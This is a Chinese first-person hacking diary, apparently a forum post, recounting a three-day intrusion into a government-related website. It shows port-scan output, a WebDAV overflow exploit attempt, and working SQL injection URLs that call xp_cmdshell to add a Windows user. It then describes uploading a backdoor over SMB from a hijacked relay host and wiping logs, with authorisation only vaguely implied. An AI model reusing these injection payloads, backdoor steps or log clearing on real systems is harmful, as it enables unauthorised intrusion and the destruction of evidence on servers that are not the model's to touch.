目标:取得管理员权限,在网站中留一个网页,收集漏洞情况。
计划:第一天进行踩点,第二天测试进攻,第三天看看网站的论坛……最终取得管理员权限。
1. 好久没有入侵了,很多都不会了,不过步骤还是要的。首先进行踩点(我踩踩踩!!),当然不是盲目的去扫描,先ping了一下他的网站。
Ping www.inday.com
Pinging www.inday.com [210.10.10.10] with 32 bytes of data:
Reply from 210.10.10.10: bytes=32 time=60ms TTL=115
Reply from 210.10.10.10: bytes=32 time=50ms TTL=115
Reply from 210.10.10.10: bytes=32 time=50ms TTL=115
Reply from 210.10.10.10: bytes=32 time=60ms TTL=115
Ping statistics for 210.10.10.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 50ms, Maximum = 60ms, Average = 55ms
恩,速度不错,看了看TTL看来有什么路由或者防火墙之类的。
打开浏览器,输入网址:http://www.inday.com 看了看,不错嘛,一个政府相关站点。稍微看了看,找到一个论坛,动网5.0的,网页采用asp的文章系统,不知道是哪个。可能有人会说用动网的洞直接得到密码就好拉,不错,这是一种方法,其实我是那里的管理员,想得到密码很容易,但此次入侵的目的就没达到了,所以我没用此方法。心想是如果实在不行,就利用动网的洞44。好,网站看好了,我在浏览器里输入了他的IP:210.10.10.10 晕!此页面无法显示。心想:不会吧,虚拟主机要我入侵,那怎么会是得到批准的呢??再说一般的虚拟主机都很稳定,管理员都非常负责。诶,管他呢,继续。
基本的探测可以了,下面请出扫描器。很多人会选用1种扫描器进行网站测试,但我不认为这样很好,因为很多扫描器都有自己的特性。比如x-scan的详细,流光的快,还有一些针对特定漏洞的扫描器等等。所以这次我采用了很多扫描器。
先我使用了流光5,不错吧,不要羡慕,我们联盟有下载,破解了时间和IP限制的。
OK,开始扫描,如果你不会,那你看看流光的帮助好了,本文不谈如何使用。榕哥的作品就是好,虽然不知道流光5是不是榕哥做的,但很多都是基于流光4.7的。没到4分钟,扫描完毕,查看扫描记录:
扫描 210.10.10.10 IIS5.0 NULL.Printer Exploit ...成功(不提了,从没成功过)
PORT-> 主机 210.10.10.10 端口 0080 ...开放
PORT-> 主机 210.10.10.10 端口 0021 ...开放 (不错,如果是虚拟主机空间就可以暴力破解)
PORT-> 主机 210.10.10.10 端口 0110 ...开放
PORT-> 主机 210.10.10.10 端口 0025 ...开放
FTP-> 主机 210.10.10.10 FTP 版本信息 ... Serv-U FTP Server v4.0 for WinSock ready...(据说有溢出漏洞,等会再说)
PORT-> 主机 210.10.10.10 端口 0139 ...开放 (失望,这种端口都看得见)
IIS-> 主机 210.10.10.10 IIS检测 FrontPage 扩展 ...成功 (老漏洞了,不过我没成功过)
PLUGIN-> 扫描 210.10.10.10 IIS 5.0 WEBDAV Exploit ...成功 (我喜欢,不过成功率很小)
PORT-> 主机 210.10.10.10 端口 0443 ...开放
PORT-> 主机 210.10.10.10 端口 1433 ...开放 (这个是关键点)
太让人失望了,一台服务器开了那么多端口不说还有那么多漏洞。从流光的扫描中我看到一份非常重要的信息。此机的计算机名就是网站名字,而且看到开放了1433端口,所以在此我确信为主机托管(老兄,托错人了)。
在这里我开始探测性的攻击了一次,使用的是webdav漏洞。
D:\>webdavx3.pl 210.10.10.10
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 210.10.10.10 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
………………
没有成功,这里我感到很奇怪,webdav的溢出程序对没打补丁的机器(因为都是些老漏洞,一开始以为没打什么补丁,害我走了很多弯路)怎么不起作用啊(先前认为的,后面才知道错了)。
今天的目的是踩点,所以这些资料是不够的,知己知彼,百战不殆。能有多的信息就尽量多。拿出x-scan进行探测……2分钟后,x-scan把我电脑资源吃光,被迫重启!◎¥◎#¥!◎#%
好,GUI不行那cmd进行扫描,2分钟后……x-scan又把我资源耗尽,再次重启。眼睛冒火了◎◎◎◎
开启肉鸡,3389的,不错吧,在这里谢谢海兄提供肉鸡:)
好,在肉鸡上把该用的都下载来,先用x-scan扫描。机器好没办法,速度极快,大概10分钟后OK了。看看结果,呵呵,x-scan果然是好东西,比较具体。
/iishelp/iis/misc/iirturnh.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/scripts/samples/search/qfullhit.htw
/scripts/samples/search/qsumrhit.htw
/null.ida
/null.idq
/abczxv.htw
/default.asp%81
/default.asp
一下子多了那么多CGI漏洞,而且还扫描出了一个令人兴奋的端口:3389。
OK,再次探测性攻击,打开终端连接器,填入端口,1,2,3,看见登入画面了。看看输入法。。。。。晕死,打好了,怎么会???开始疑惑了。算了,看看其他的吧。我把上面的漏洞找了遍,都没成功,看来运气不好,不过有一个漏洞到成功了,但是路径没猜对。/scripts/samples/search/qfullhit.htw
在绿盟的漏洞资料里查到这个漏洞存在着越界查看漏洞,就是说可以查看任意文件。可是。。。。因为不知道具体路进,都没成功,而且他的web站点放在了D盘,所以没有成功(事后知道的)。CGI啊CGI为什么我老不行呢?不相信,随后去了绿盟找了点EXPilot,编译后进行探测攻击,X,失败告终。。
难道非要我从论坛入手???我偏不要。冷静下来后我决定再次看看网页,随后又找了扫描器老大哥SSS进行扫描。
在观察网页种,无疑进入了下载页面,看来还没做好。无疑间我点了回首页的连接,晕,卡住了,看看连接地址,晕,file://d:/defual.asp 百密必有一疏,看到路径了,可。。。。两个盘符,跨盘符好像没提到,不管了,先试试吧,10分钟过去,依然不行,看来又走不通了。看看肉鸡的SSS扫描结果,老大哥就是老大哥,没话说,对于CGI的准确性非常厉害,那些漏洞虽然扫出来了,但前面有个X说明是个幌子,不过有一个,查找资料。绿盟竟然没有??那去google看看,找到几个,看了看漏洞介绍,针对iis4.0的,晕,白开心了,那怎么入手呢????
看了看时间,2点了,明天上课,所以今天倒此了,不过目的达到了,毕竟今天的任务是踩点。睡觉先。
第二天,晚上9点,呵呵,精神来了,继续昨天的排演。本来今天想整理下资料看看的,可还是不死心,又开始了扫描,结果一样。
刚想起来是有MSsql数据库的,找找最新的资料,看到MYSQL有溢出漏洞,编译了攻击程序,试验了下,结果是,失败:( 看看网页吧。
找到一个网管信箱,看看。。。。。。。是webclint邮件服务器,看看版本,晕,6.8的,我记得的漏洞是2.4的,看来又不行了,诶,真不甘心。看看文章系统吧,总觉得是免费的文章系统,不过是利用SQL数据库的。先看看他的查询:
http://www.inday.com/gunye.asp?boardID=5
http://www.inday.com/news.asp?boardID=2
下面都雷同,只是asp页不同,关键语句是boardID,使用的查询语句可能是
"select * from where boardid="&boardid&"……
后面我就猜不到了,再看看新闻页面
http://www.inday.com/ShowAnnounce.asp?boardID=2&RootID=1194&ID=1194&tion=7
标准的新闻系统,呵呵,那我们来44SQL 注入攻击看看。注意,SQL注入问题非常严重,请大家不要乱用下面的演示。相关资料网上已经有很多了,这里不再介绍。
我使用了http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin RHC进行查看,返回了语法错误,我再继续
http://www.inday.com/news.asp?boardID=2;exec;sp_addlogin hax--,返回
ADODB.Recordset 错误 '800a0cb3'
当前记录集不支持书签。这可能是提供程序或选定的游标类型的限制。
/news.asp,行358
成功,yeah~~~~~~~~兴奋中!!!
然后我就一步一步添加了一个用户。哦,对了,还没说这个漏洞呢,这个漏洞是针对ASP+SQL的,一些asp页面没有进行过滤,使攻击者能执行任意命令,很简单,SQL我想大家都知道吧,如果得到用户密码就等于知道了这台主机的控制权。那我在SQL里创建一个本地用户没有问题吧,好我们来创建。以下程序很危险,请勿试。这里提一下,后面的—是SQL语句的注释,那后面的语句就不起作用了,嘿嘿。
http://www.inday.com/news.asp?id=2;exec master.dbo.sp_addlogin RHC;--
http://www.inday.com/news.asp?id=2;exec master.dbo.sp_password RHC,www.realhack.org;--
http://www.inday.com/news.asp?id=2;exec master.dbo.xp_cmdshell 'net user RHC www.realhack.org /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
哈哈,创建了一个RHC用户,密码为www.realhack.org。现在那个3389就可以用了,打开终端连接器,输入用户名和密码,OK,进入。。进入。。。进入。。。。。。。!!!!终端已经超过最大连接数。。。。。狂晕!!
这时候我们的目的基本达到了,该是清理战场,然后写报告的时候了。既然3389不能进,但是139还开着,OK,net use 上去,我传了朋友做的一个后门程序,然后看了看他们的配置和web的存放位置,和我猜的没错,采用分盘管理。很严谨。在C盘,意外看见了w2ksp3补丁 ,看来先前的失败是有原因的。好了,清理日记。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
